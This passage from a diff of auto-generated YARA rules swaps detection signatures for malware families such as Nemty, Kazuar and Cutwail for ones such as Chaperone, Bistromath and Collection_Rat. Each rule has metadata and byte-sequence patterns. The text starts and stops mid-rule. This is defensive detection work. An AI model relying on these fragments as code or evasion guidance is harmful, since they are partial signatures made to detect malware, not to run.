4889842410030000 488bf9 488d8c2401020000 33d2 41b803010000 c684240002000000 } - $sequence_3 = { 488bd9 4885c0 7479 488d0d7fe50000 483bc1 746d 488b8310010000 } - $sequence_4 = { 4533db 488d9424f0000000 41b803010000 44895c2440 4c895c2448 ff15???????? 833d????????00 } - $sequence_5 = { 486bd258 490394c1a04b0100 f6423880 742c } - $sequence_6 = { 488bcb 488905???????? ff15???????? 488d1547d20000 488bcb 488905???????? ff15???????? } - $sequence_7 = { cc 4c8d05f8530000 498bd4 488bcd e8???????? 85c0 } - $sequence_8 = { 488b0d???????? eb7c 4c8d256a830000 488b0d???????? eb6c e8???????? } - $sequence_9 = { 488d0d50bf0000 ba01000000 e8???????? 4c8d442440 } + $sequence_0 = { 89442405 89442409 668944240d 8844240f 8b11 8d442410 } + $sequence_1 = { c3 8b9c24a4000000 68???????? 53 8d4c2444 } + $sequence_2 = { c68424e200000069 888424e3000000 889c24e4000000 888c24eb000000 c68424ec00000047 c68424ed00000020 } + $sequence_3 = { b93f000000 33c0 8dbc2441010000 889c2440010000 b265 f3ab } + $sequence_4 = { 8dbd48f7ffff 83c9ff 33c0 f2ae f7d1 83c1ff 51 } + $sequence_5 = { 889c2410020000 89442461 889c2410070000 6689442465 889c2410030000 } + $sequence_6 = { 8b4c2410 56 50 51 e8???????? 68???????? 8d542420 } + $sequence_7 = { 48 0d0000ffff 40 6689442408 25ffff0000 8d1440 } + $sequence_8 = { 50 e8???????? 83c40c 85c0 752a e8???????? } + $sequence_9 = { 8b7c240c 8b04bd10894000 8d1cbd10894000 3d00100000 0f84c8000000 8b04bd20094100 56 } condition: - 7 of them and filesize <198656 + 7 of them and filesize <188416 } -rule MALPEDIA_Win_Vendetta_Auto : FILE +rule MALPEDIA_Win_Chaperone_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "966ae160-05eb-53d3-b86d-ed42268f2f0c" + id = "5069c84b-f6f9-588d-8536-63d238bdb1de" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vendetta" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.vendetta_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chaperone" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.chaperone_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "4fce9b15fe513b7322e530a7cc2cb9b1afb7d5162c1238338f15db6a45fbd5fd" + logic_hash = "9d40dc4ee44ea2fe4f6bf05be1cccf6d78aa19e4569d2284fce73479ea6dfe7a" score = 75 quality = 75 tags = "FILE" @@ -148544,32 +151329,32 @@ rule MALPEDIA_Win_Vendetta_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b04c5e06f4100 5d c3 33c0 5d } - $sequence_1 = { 83c408 84c0 0f845d010000 6a00 51 0bf9 } - $sequence_2 = { 660f2815???????? f20f59db 660f282d???????? 660f59f5 660f28aa30914100 } - $sequence_3 = { 83a500fcffff00 51 8d8df8fbffff e8???????? 898500fcffff } - $sequence_4 = { 8b4508 dd00 ebc6 c745e0d8924100 e9???????? c745e0e0924100 } - $sequence_5 = { 6a30 eb27 3bcb 7f0e 7c08 81fa0000800c 7704 } - $sequence_6 = { 7309 8b04c5e06f4100 5d c3 33c0 5d c3 } - $sequence_7 = { 85c0 7433 8bce e8???????? 8bf8 } - $sequence_8 = { 33c9 8bc1 3914c5b89b4100 7408 40 83f81d 7cf1 } - $sequence_9 = { 53 8d85f0f7ffff 50 56 } + $sequence_0 = { f3a4 488dbc2458010000 488d35d6490100 b918000000 f3a4 48c784245001000000000000 83bc249002000000 } + $sequence_1 = { 85c9 782e 3b0d???????? 7326 4863c9 488d15f8ca0100 488bc1 } + $sequence_2 = { eb05 1bc0 83d8ff 85c0 0f8475010000 488d15aeaf0100 488d8c24ec040000 } + $sequence_3 = { 488d9424a8020000 488b4c2430 ff15???????? 81bc24a802000003010000 0f8486000000 } + $sequence_4 = { 751f 83bc24d001000002 7515 83bc24c801000001 720b c78424a801000005000000 83bc24c401000006 } + $sequence_5 = { 488d94088c020000 488b8c2438490000 e8???????? 89842444490000 83bc244449000000 } + $sequence_6 = { ff15???????? 488905???????? 48833d????????00 750b c78424c801000002000000 488d9424a0020000 488b8c2480030000 } + $sequence_7 = { 0fb702 66898424d0000000 488d9424f0020000 488d8c24d0000000 ff15???????? 488d8c24d0000000 ff15???????? } + $sequence_8 = { ff15???????? 66ba5c00 488d4c2440 e8???????? 4889842450020000 488b842450020000 4883c002 } + $sequence_9 = { 49c1fe05 4c8d3d40cc0100 83e61f 486bf658 4b8b04f7 0fbe4c3008 83e101 } condition: - 7 of them and filesize <296960 + 7 of them and filesize <373760 } -rule MALPEDIA_Win_Nemty_Auto : FILE +rule MALPEDIA_Win_Bistromath_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "63cde4fd-76ae-5ec0-8a56-1ffc39628f31" + id = "62a1b548-25a5-5273-be8b-9848556649f4" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemty" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nemty_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bistromath" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bistromath_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "ab3eef0d79392145b4ed1a1315366f250ca5ff150cf5d778f7e9e8528f09f4dc" + logic_hash = "b9314d0c2625ba0e21f5bfba175e042ed0e577dd2d934e440857096b6f3294e9" score = 75 quality = 75 tags = "FILE" @@ -148583,32 +151368,32 @@ rule MALPEDIA_Win_Nemty_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 51 e8???????? 59 e8???????? 83c438 85c0 } - $sequence_1 = { 8945a4 a1???????? 59 bf???????? 8bca 83f810 7302 } - $sequence_2 = { 81ec18040000 a1???????? 33c5 8945fc 837d2010 8b4508 } - $sequence_3 = { 83781408 8b4810 57 7202 8b00 8b3d???????? 33db } - $sequence_4 = { 6a1c 99 5e f7fe 33db 895dd8 } - $sequence_5 = { 33ff e8???????? 83c61c 3b7510 75ef 6a00 } - $sequence_6 = { 83ec1c 8bd8 8bc4 68???????? e8???????? } - $sequence_7 = { 8db4248c000000 e8???????? 53 8d742454 } - $sequence_8 = { 7509 be???????? 85c0 7405 } - $sequence_9 = { 837d3810 8bf8 8b4524 59 7303 8d4524 837d3810 } + $sequence_0 = { e8???????? 85c0 741d 0f57c0 0f1100 0f114010 660fd64020 } + $sequence_1 = { ff75f0 56 e8???????? 8b45f8 83c40c c6040600 8bce } + $sequence_2 = { eb24 8d5001 e8???????? 8bf0 85f6 7416 ff75fc } + $sequence_3 = { e8???????? 8b4580 46 3bf0 7ce8 33f6 85db } + $sequence_4 = { e8???????? 8b4c2410 8901 83c718 8b442424 83c104 894c2410 } + $sequence_5 = { 8b45e8 85c0 0f84bb250000 ff474c 8d535f 8b7f4c 8bce } + $sequence_6 = { e8???????? 8945e4 85c0 0f84e1010000 ff75f0 33d2 8bcb } + $sequence_7 = { ff75fc e8???????? 8bf0 83c404 85f6 7418 8d45fc } + $sequence_8 = { 8b4df8 e8???????? 8b5324 8b4df8 e8???????? 6a30 6a00 } + $sequence_9 = { 83c404 46 8d7efe 83fe02 7304 33d2 eb2e } condition: - 7 of them and filesize <204800 + 7 of them and filesize <33816576 } -rule MALPEDIA_Win_Sidewalk_Auto : FILE +rule MALPEDIA_Win_Bubblewrap_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "14b78b08-c08d-56d8-91d9-454c97efb0a9" + id = "72aba578-e67d-518b-a6f8-45bcf7609dfd" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewalk" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sidewalk_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bubblewrap" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bubblewrap_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "db7fd110ccdf76bd73169627fa283b7d029f717432de6e469dcea6c6c2ec5ed7" + logic_hash = "461e952cc7ab9a2107d029741d486c2b8296d9f39ea5fcdb3208aa0e3f3d47fd" score = 75 quality = 75 tags = "FILE" @@ -148622,76 +151407,73 @@ rule MALPEDIA_Win_Sidewalk_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4403e8 4133db 418bcd c1c307 } - $sequence_1 = { 0bc8 41890c10 488d5204 4983e901 75d4 } - $sequence_2 = { 33c3 c1c207 c1c00c 4403c8 4533d1 } - $sequence_3 = { 488b05???????? 83780c00 7405 e8???????? } - $sequence_4 = { 488d040a 483bc6 7ce2 4883c640 } - $sequence_5 = { 8bc2 33c6 c1c010 4403d8 4133db } - $sequence_6 = { 750e 488bcf ff15???????? 4885c0 } - $sequence_7 = { c1c610 4433f2 c1c710 4403df 41c1c610 4503e6 } - $sequence_8 = { 41c1c610 4503e6 4403cb 4533d1 4403ee 41c1c210 418bc3 } - $sequence_9 = { 884202 884a03 4183f810 7ccc } - $sequence_10 = { 0fb642fe c1e108 0bc8 41890c10 } - $sequence_11 = { ff15???????? 4885c0 750e 488bcf } - $sequence_12 = { 8a040f 3201 41880408 48ffc1 } + $sequence_0 = { 68???????? 68???????? e8???????? 8b08 83c408 890d???????? 8b5004 } + $sequence_1 = { ffd6 8d542464 68???????? 52 ffd6 b900020000 } + $sequence_2 = { 56 57 6a02 8d442418 33f6 55 50 } + $sequence_3 = { 880c1a 83c9ff f2ae f7d1 49 8d7c1a01 8bd1 } + $sequence_4 = { 81ec08020000 53 56 57 ff15???????? } + $sequence_5 = { f3a5 6870010000 e8???????? 8d442448 50 6870010000 } + $sequence_6 = { 8d6ced00 89542418 c1e503 8bc5 8bdd 25ff030000 } + $sequence_7 = { 880f 8810 7c89 5d 5f 5e 5b } + $sequence_8 = { c644241f78 c644242011 c644242106 c644242274 } + $sequence_9 = { 83c404 a801 740d 8d54240c 52 e8???????? 83c404 } condition: - 7 of them and filesize <237568 + 7 of them and filesize <57136 } -rule MALPEDIA_Win_Koadic_Auto : FILE +rule MALPEDIA_Win_Unidentified_101_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e207fda4-6d66-54cd-bdbd-2bc35fe49343" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.koadic_auto.yar#L1-L130" + id = "1e5a977c-e7e9-5732-97b6-6aadc4f691fc" + date = "2023-03-28" + modified = "2023-04-07" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_101" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_101_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "4723d27185eb97d6e28808abd0dca69a0777b4b3cb3951837b42f0c81d537f3d" + logic_hash = "71f0751fbd77a928634515b558d06922b4bf4a312042d6abbd6ba70171c64843" score = 75 quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" + malpedia_rule_date = "20230328" + malpedia_hash = "9d2d75cef573c1c2d861f5197df8f563b05a305d" + malpedia_version = "20230407" malpedia_license = "CC BY-SA 4.0" malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0f84b4020000 53 56 57 8b7c2424 bb01000000 83ffff } - $sequence_1 = { 035c2408 53 58 e8???????? a3???????? 8b5c2414 035c2408 } - $sequence_2 = { 83fb01 0f8da9000000 8b542404 ff35???????? e8???????? 8b15???????? } - $sequence_3 = { 50 8d4c2420 51 e8???????? e9???????? 6a08 } - $sequence_4 = { 3b1c24 7527 8b15???????? ff35???????? e8???????? 8d05c8334100 50 } - $sequence_5 = { 72f1 eb07 8b34c5c4124100 8bc6 8d5001 } - $sequence_6 = { 7507 c7450c02104100 53 56 8b7508 f6462c01 57 } - $sequence_7 = { 50 68???????? ff35???????? e8???????? 21c0 7414 ff35???????? } - $sequence_8 = { e8???????? 890424 6800000000 e8???????? a3???????? ff35???????? ff742404 } - $sequence_9 = { ff15???????? 8b542434 81c200000800 89542428 eb04 8b5c2414 8b442434 } + $sequence_0 = { c70016000000 e8???????? 83c8ff e9???????? 498bc4 488d0ddb070100 83e03f } + $sequence_1 = { 6689842404010000 b865000000 6689842406010000 33c0 6689842408010000 } + $sequence_2 = { 33c0 b968000000 f3aa 488d842400010000 4889442448 488d842430020000 4889442440 } + $sequence_3 = { 4889742410 57 4883ec20 418bf0 4c8d0debb40000 8bda 4c8d05dab40000 } + $sequence_4 = { c744243000000000 4c8d4c2430 4c8b442440 8b542468 488b4c2460 } + $sequence_5 = { c68424e900000065 c68424ea00000057 c68424eb00000000 c644243052 c644243165 c644243261 c644243364 } + $sequence_6 = { 428a8c1910e40100 4c2bc0 418b40fc 4d894108 d3e8 41894120 } + $sequence_7 = { 48c744242000000000 4c8d8c24c8000000 448b442450 488b542458 488b4c2470 ff15???????? } + $sequence_8 = { 41b804010000 488d942400030000 33c9 ff15???????? c744245801000000 e8???????? 833d????????01 } + $sequence_9 = { 7528 48833d????????00 741e 488d0dd8450100 e8???????? 85c0 740e } condition: - 7 of them and filesize <180224 + 7 of them and filesize <402432 } -rule MALPEDIA_Win_Kazuar_Auto : FILE +rule MALPEDIA_Win_Hookinjex_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "bbccb83c-4401-524c-a829-9e1fecf876f5" + id = "cc81917a-8c1e-59eb-8738-a94445516bc1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kazuar" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kazuar_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hookinjex" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hookinjex_auto.yar#L1-L148" license_url = "N/A" - logic_hash = "8a42fd36e815cd90ae38c5e050f60bebec4410e7ad562404ae7ac137541dd601" - score = 75 - quality = 75 + logic_hash = "afb96fa06c3548b099102aa92aa51777edafb1bb6fe4920aba390d45066ccc62" + score = 60 + quality = 25 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -148703,32 +151485,38 @@ rule MALPEDIA_Win_Kazuar_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 3d88ae6393 7506 498b4310 eb0f } - $sequence_1 = { e8???????? 4c8d4c2428 31d2 31c9 01c0 4c89442438 6689442430 } - $sequence_2 = { 8d8b80030000 894c240c 8d8b00030000 894c2408 8d4b08 894c2404 } - $sequence_3 = { 740a 81ea00204000 01d0 eb02 31c0 5d c3 } - $sequence_4 = { 7452 83b98c00000000 7449 4c01de } - $sequence_5 = { 8b45dc 8b10 890424 ff520c 85c0 52 } - $sequence_6 = { 8b461c 498d1493 8b0402 4c01d8 } - $sequence_7 = { 8bb188000000 85f6 7452 83b98c00000000 7449 4c01de 31db } - $sequence_8 = { 89d7 7463 4863493c 4c01d9 8bb188000000 85f6 7452 } - $sequence_9 = { 890424 894c2410 8d8b80030000 894c240c 8d8b00030000 } + $sequence_0 = { e8???????? 85c0 740c b913e40000 } + $sequence_1 = { e8???????? b964000000 ff15???????? 0fb705???????? } + $sequence_2 = { e8???????? 85c0 7507 b80e000000 } + $sequence_3 = { e9???????? 488b4c2458 e8???????? 488b4c2450 } + $sequence_4 = { e8???????? b95b730100 e8???????? e9???????? } + $sequence_5 = { e8???????? 85c0 750f b9dc550100 } + $sequence_6 = { e8???????? 833d????????00 7411 b903000000 e8???????? } + $sequence_7 = { e8???????? 85c0 7408 803b00 } + $sequence_8 = { 48817c243000100000 0f82dc020000 488b442460 4889442438 } + $sequence_9 = { 2500180000 3d00080000 750d c78424e800000001000000 eb0b } + $sequence_10 = { 25001b0000 3d00100000 750a c744244401000000 } + $sequence_11 = { 25001b0000 3d00110000 750d c784243c01000001000000 } + $sequence_12 = { 25001b0000 3d00100000 750d c784242401000001000000 } + $sequence_13 = { 2500180000 3d00180000 750a c744247c01000000 } + $sequence_14 = { 25001b0000 3d00110000 750a c744245c01000000 } + $sequence_15 = { 48817c243800100000 0f82f5000000 488b442438 4883c02f } condition: - 7 of them and filesize <81920 + 7 of them and filesize <6545408 } -rule MALPEDIA_Win_Cutwail_Auto : FILE +rule MALPEDIA_Win_Collection_Rat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "62e269de-1aa8-5a3f-857f-84d4e225d36e" + id = "57812c72-d174-5305-a791-07d9524d5d58" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cutwail_auto.yar#L1-L165" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.collection_rat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.collection_rat_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "c6c78a26e86e94e8584b09088785fb67085bf6ba9ec9ef8f1d52fe4203a44bcb" + logic_hash = "47382a0b15866fbc9363efde1f8fbfda4134e668af0afa7d4fd14596481603d4" score = 75 quality = 75 tags = "FILE" @@ -148742,40 +151530,34 @@ rule MALPEDIA_Win_Cutwail_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8808 ebc1 8b5508 03550c c60200 c745fc01000000 8b45fc } - $sequence_1 = { 3930 0f8491010000 8b08 8b09 894d40 } - $sequence_2 = { eb12 8d45f4 50 8b4704 } - $sequence_3 = { 59 e9???????? 8b7de0 8b45f8 83f808 } - $sequence_4 = { 8b8568feffff 0560ea0000 39855cfeffff 7633 8b8d5cfeffff 898d68feffff e8???????? } - $sequence_5 = { 8b400c 894564 8d4568 50 } - $sequence_6 = { c7410400000000 6830750000 ff15???????? 8b55fc 8b02 50 } - $sequence_7 = { 837d1000 7d04 32c0 eb7d } - $sequence_8 = { 84c0 745e 46 8a06 } - $sequence_9 = { 51 e8???????? 83c40c c785e0fdffff00000000 c785dcfdffff00000000 } - $sequence_10 = { 3bdf 894510 0f84ecfdffff 53 50 } - $sequence_11 = { 68a6000000 89450c e8???????? 03c3 50 } - $sequence_12 = { e8???????? 83c410 8985ecfdffff 83bdecfdffffff 0f84ae000000 8b95e4fdffff } - $sequence_13 = { 76ce 8b7d6c 83ff1d 740e } - $sequence_14 = { 7509 c68563feffff01 eb77 83bd6cfeffff05 7d6e ff15???????? 89855cfeffff } - $sequence_15 = { e8???????? 83c414 8b85dcfdffff 2b85d8fdffff 0345fc } + $sequence_0 = { 488b5567 488d4ef0 4803cf 458bc6 e8???????? 85c0 } + $sequence_1 = { 488d05870c0100 488bd9 488901 f6c201 740a ba18000000 e8???????? } + $sequence_2 = { 488b4138 8938 e9???????? 488b05???????? 488b4808 488b4130 } + $sequence_3 = { 4883c102 33d2 e8???????? 488b0d???????? 488b5108 48894218 488b05???????? } + $sequence_4 = { 0f8467010000 488bc4 48895808 48897010 48897818 4c897020 55 } + $sequence_5 = { 458bf0 0fb7f2 4885c9 0f84d1000000 488b9c24a8000000 4885db } + $sequence_6 = { 83a424b000000000 ba14000000 33c9 448d42fa e8???????? 488d0d74740200 ffd0 } + $sequence_7 = { e8???????? 482be0 bd00100000 488d8c24e0000000 448bc5 33d2 } + $sequence_8 = { 488b4a28 e8???????? 84c0 740b 488bd6 498bcd } + $sequence_9 = { 488b4830 4c89542450 bf03000000 897c2448 488d442468 4889442440 488d8424d0000000 } condition: - 7 of them and filesize <262144 + 7 of them and filesize <397312 } -rule MALPEDIA_Win_Clambling_Auto : FILE +rule MALPEDIA_Win_Beepservice_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "55c68f1e-9478-508c-963a-a6b0515c5aac" + id = "1d7d7c47-2c0e-5f10-8d42-753504cd309b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.clambling" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.clambling_auto.yar#L1-L115" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.beepservice" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.beepservice_auto.yar#L1-L282" license_url = "N/A" - logic_hash = "bda71815f9f64d048a93fa253b5199d20d6e6d47cb677b3884b8c43571e95a8e" + logic_hash = "1b28ba46a772486fbc8465a9c3e2af5f383317dc6efaca43bb04db774c11995d" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -148787,32 +151569,51 @@ rule MALPEDIA_Win_Clambling_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6689bc24b0000000 ff15???????? 3bc7 7508 } - $sequence_1 = { 488bd9 498d53e8 418d4802 498943f0 ff15???????? } - $sequence_2 = { 751b e9???????? bb46270000 eb0f ff15???????? 8bd8 eb05 } - $sequence_3 = { 3bc3 751f 8b4c2428 488d942490020000 ff15???????? } - $sequence_4 = { eb0f ff15???????? 8bd8 eb05 bbc7040000 } - $sequence_5 = { 7507 66893d???????? 488b0d???????? 488d542430 ff15???????? 448b442430 } - $sequence_6 = { 7408 488bcb e8???????? 488b5c2458 } - $sequence_7 = { 4c8d442430 33d2 c744243001000000 c744243c02000000 ff15???????? 85c0 } - $sequence_8 = { b8b4050000 eb13 488b03 488bd7 488bcb } - $sequence_9 = { 41b805000000 48894c2420 33c9 8bd5 } + $sequence_0 = { ffd6 8bc8 ff15???????? 50 } + $sequence_1 = { 8b0d???????? 68???????? ffd6 8bc8 } + $sequence_2 = { e8???????? 83f801 7505 e8???????? 68???????? 68???????? } + $sequence_3 = { 7512 6888130000 68???????? e8???????? 83c408 } + $sequence_4 = { 83c408 e9???????? 68???????? e8???????? 83c404 6a00 } + $sequence_5 = { 683f000f00 6a00 68???????? ff15???????? } + $sequence_6 = { ff7604 68???????? e8???????? ff7608 e8???????? 83c40c } + $sequence_7 = { 83ffff 750e ff15???????? 50 68???????? eb43 } + $sequence_8 = { 68???????? 57 ff15???????? 85c0 741c 3975fc } + $sequence_9 = { ff7604 e8???????? 83f814 59 } + $sequence_10 = { e8???????? 83f820 59 730f ff7618 68???????? e8???????? } + $sequence_11 = { e8???????? ff7610 e8???????? 50 ff7610 53 e8???????? } + $sequence_12 = { 83c410 8d4c2408 6a00 6a00 } + $sequence_13 = { bf???????? a3???????? 83c404 a3???????? a3???????? 66a3???????? f3ab } + $sequence_14 = { 85c0 742b 817c240400240000 7521 56 } + $sequence_15 = { ffd7 8d442414 50 56 } + $sequence_16 = { 8bca 83e103 f3a4 8b7314 83c9ff 8bfe } + $sequence_17 = { e8???????? 83c404 50 8b4d0c 8b5114 } + $sequence_18 = { e8???????? 83c408 33c0 e9???????? c785f8fdffff00240000 6a00 8d95f4fdffff } + $sequence_19 = { 8b0d???????? ff15???????? 8bc8 ff15???????? 8b15???????? 52 } + $sequence_20 = { 8b511c 52 e8???????? 83c404 83f820 } + $sequence_21 = { 6a01 6a00 6a00 6a05 e8???????? 83c414 } + $sequence_22 = { e8???????? 6a00 6a00 b907000000 6a00 } + $sequence_23 = { c3 68e8030000 6a02 6a00 6a00 6a02 } + $sequence_24 = { 6a04 e8???????? 83c414 85c0 7510 ff15???????? } + $sequence_25 = { 50 53 c744241428010000 e8???????? } + $sequence_26 = { bf???????? 83c9ff 33d2 b301 f2ae f7d1 49 } + $sequence_27 = { b90a000000 be???????? bf???????? 33c0 f3a5 bf???????? 83c9ff } + $sequence_28 = { 52 89442424 ff15???????? 8bf0 85f6 7505 } condition: - 7 of them and filesize <412672 + 7 of them and filesize <253952 } -rule MALPEDIA_Win_Alma_Locker_Auto : FILE +rule MALPEDIA_Win_Rerdom_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a8975e90-f59f-53dc-8c8c-bbe753edcfd3" + id = "26b21d13-90fc-5a47-a822-e7b7af65cf28" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_locker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.alma_locker_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rerdom" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rerdom_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "df780972bf15a2baf7532cad09aa2dd13a5bee9ccc29d4fb62357c0162af8a26" + logic_hash = "f1628ed7c3a0f5463a2b7ad02b3e6deb2af0e74d20f58edaa325cbcbd6ff539b" score = 75 quality = 75 tags = "FILE" @@ -148826,32 +151627,32 @@ rule MALPEDIA_Win_Alma_Locker_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d8d6cfeffff e8???????? 83c404 8d4d8c c645fc07 51 8bd0 } - $sequence_1 = { 720e ffb5ccfeffff e8???????? 83c404 837da008 720b ff758c } - $sequence_2 = { 0304b5e86a0210 59 eb02 8bc3 8a4024 247f 3c01 } - $sequence_3 = { 50 ff15???????? 8bf0 89b52cfaffff } - $sequence_4 = { 83e11f c1f805 c1e106 8b0485e86a0210 f644080401 7405 } - $sequence_5 = { 8d8dd0fbffff e8???????? c645fc03 8d85d0fbffff 83bde4fbffff10 0f4385d0fbffff } - $sequence_6 = { b9???????? e8???????? 33c0 c645fc1f 33c9 66a3???????? 66390d???????? } - $sequence_7 = { 81fbfeffff7f 0f87ab000000 8b4614 3bc3 7325 ff7610 53 } - $sequence_8 = { b9???????? c705????????07000000 0f44f8 c705????????00000000 57 68???????? } - $sequence_9 = { 83c404 c78584fbffff0f000000 c78580fbffff00000000 c68570fbffff00 83bd9cfbffff10 720e } + $sequence_0 = { 85f6 7425 8b550c b8???????? e8???????? 3bc7 } + $sequence_1 = { 89470c 8b4508 894708 eb1c 33db 53 } + $sequence_2 = { 8b44240c 21b0cc000000 21b0d0000000 8bd8 8d842412060000 50 83ceff } + $sequence_3 = { e9???????? 83f801 7533 8b4e04 8b97d0000000 8b4608 } + $sequence_4 = { e8???????? 53 a3???????? 57 8bc6 e8???????? 5f } + $sequence_5 = { 8b742430 8d4618 50 8d4c2428 e8???????? 84c0 741e } + $sequence_6 = { 7527 8b4510 85c0 7405 } + $sequence_7 = { 3bde 0f84c5000000 8b430c 3bc6 0f84ba000000 897510 8b00 } + $sequence_8 = { 8b450c e8???????? 8945e4 85c0 7427 8365fc00 ff750c } + $sequence_9 = { 41 66890456 0fb7044b 6685c0 75ec 8bc3 } condition: - 7 of them and filesize <335872 + 7 of them and filesize <352256 } -rule MALPEDIA_Win_Headertip_Auto : FILE +rule MALPEDIA_Win_Cradlecore_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "85fa344d-9a7e-5c14-be69-b6cdc5f3bcac" + id = "de5cfc2b-ebd2-5b2c-afe8-802a7c966fb2" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.headertip" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.headertip_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cradlecore" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cradlecore_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "4007b2c1a7322a986be26c8429a660608ab1b4d0812b16868306a2db8cbc4c12" + logic_hash = "50e3eefefe56e4c7c3dbb9ce61b4c12511d78dda94103f69f932673a673b2621" score = 75 quality = 75 tags = "FILE" @@ -148865,32 +151666,32 @@ rule MALPEDIA_Win_Headertip_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c0 7434 8b07 ff4d08 03c3 56 } - $sequence_1 = { 57 ff15???????? 59 eb32 ffd6 } - $sequence_2 = { c645d274 c645d36f c645d472 c645d579 c645d657 885dd7 c645ac47 } - $sequence_3 = { c6458d75 c6458e65 c6458f72 c6459079 c645914f c6459270 